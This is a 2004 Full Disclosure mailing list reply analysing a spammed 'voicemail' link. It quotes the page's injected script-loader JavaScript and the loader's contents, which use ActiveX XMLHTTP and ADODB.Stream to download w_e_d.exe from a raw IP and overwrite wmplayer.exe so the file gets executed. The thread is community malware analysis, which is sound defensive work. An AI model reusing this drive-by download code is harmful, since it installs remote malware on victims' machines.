Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: spamming trojan?

From: Michael Gargiullo <mgargiullo () warpdrive net>
Date: Wed, 16 Jun 2004 09:59:43 -0400
On Wed, 2004-06-16 at 08:23, Geo. wrote:

Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)

http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)

which brings up a frames based page with one of the frames containing this

    function InjectedDuringRedirection(){

 showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\&apos;><\/script>'";

Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.

Geo.



Here's the contents:

var x = new ActiveXObject("Microsoft.XMLHTTP"); 
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0); 
x.Send(); 

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

so whatever w_e_d.exe is...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: